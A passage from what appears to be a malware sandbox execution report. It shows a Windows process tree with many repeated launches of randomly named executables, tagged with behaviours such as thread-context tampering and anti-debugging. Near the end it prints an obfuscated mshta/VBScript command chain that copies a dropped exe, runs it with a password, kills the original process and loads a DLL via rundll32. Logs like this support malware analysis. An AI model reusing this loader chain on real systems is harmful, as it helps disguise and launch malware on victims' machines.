C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe"C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe"8⤵
- Suspicious use of SetThreadContext
PID:8476 -
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10192
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5652
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:2340
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9912
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6744
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5920
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5840
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:944
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4024
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 2810⤵
- Program crash
PID:6184
-
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:8888
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9324
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6800
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6104
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:504
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:1728
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10452
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10928
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:7076
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10624
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11188
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4320
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5644
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5704
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4304
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11240
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:3040
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:904
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7028
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7012
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5136
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9432
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Executes dropped EXE
PID:5876
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10984
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7412
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:8764
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Enumerates system info in registry
PID:7684
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5452
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6056
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10148
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11024
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6184
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7488
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Suspicious use of AdjustPrivilegeToken
PID:10016
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6672
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10272
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7804
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7052
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4532
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9064
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10784
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:3008
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5264
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9900
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10220
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9656
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9656 -s 2810⤵
- Program crash
PID:3064
-
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:8392
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5748
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:2316
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7112
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10824
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10832
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5880
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2810⤵
- Program crash
PID:5388
-
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10840
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5492
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:8736
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7172
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6652
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4876
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4912
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5220
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10572
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4448 -s 2810⤵
- Program crash
- Checks processor information in registry
PID:6268
-
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:1556
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9660
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:8636
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6312
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:132
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:1936
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12904
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9580
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12500
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11076
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7772
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10788
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5208
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:3016
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7676
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵
- Suspicious use of AdjustPrivilegeToken
PID:5556
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10484
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13276
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13436
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13848
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14272
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7300
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14320
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13608
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14280
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11452
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13380
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13256
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14184
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11656
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6612
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:6848
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12380
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13564
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:9884
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 13640 -s 2810⤵
- Program crash
PID:13896
-
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11364
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12916
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11464
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:7388
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12768
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:13440
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5444
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14288
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12432
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12620
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:5392
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12796
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12568
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14756
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:15324
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14936
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14572
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:11512
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:10560
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:14944
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:4660
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:12032
-
-
C:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exeC:\Users\Admin\Documents\1EdD3teN6KkB5VqAYDo5FDa6.exe9⤵PID:15380
-
-
-
C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe"C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe"8⤵PID:8512
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF """" == """" for %N In ( ""C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )9⤵PID:8620
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "" == "" for %N In ("C:\Users\Admin\Documents\UV0ASfO4O1IcOKoDrntR0_nX.exe" ) do taskkill -F /Im "%~nXN"10⤵PID:8524
-
C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exEKRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG11⤵PID:9504
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBScRipT: CLOSe ( CreATEoBjECT ("wscrIpt.SheLL" ). RUn ( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF ""-pA1IQsAATOS0kxrmeOcrgfdjncUG "" == """" for %N In ( ""C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE"" ) do taskkill -F /Im ""%~nXN"" " , 0, True ) )12⤵PID:6536
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" > KRkNvH~YgUUt9O.exE && STarT KRKNvH~yGuUT9O.eXE -pA1IQsAATOS0kxrmeOcrgfdjncUG & iF "-pA1IQsAATOS0kxrmeOcrgfdjncUG " == "" for %N In ("C:\Users\Admin\AppData\Local\Temp\KRkNvH~YgUUt9O.exE" ) do taskkill -F /Im "%~nXN"13⤵PID:5496
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" .\p_ZPP.J p12⤵PID:8188
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -F /Im "UV0ASfO4O1IcOKoDrntR0_nX.exe"11⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:10080
-
-
-
-
-
C:\Users\Admin\Documents\k8xnUrcNZ2lhFB3KQ8k8L4ZG.exe"C:\Users\Admin\Documents\k8xnUrcNZ2lhFB3KQ8k8L4ZG.exe"8⤵PID:8840
-
-
C:\Users\Admin\Documents\wfIV8jV52oMTs8swOrJDTUfg.exe"C:\Users\Admin\Documents\wfIV8jV52oMTs8swOrJDTUfg.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:8832
-
-
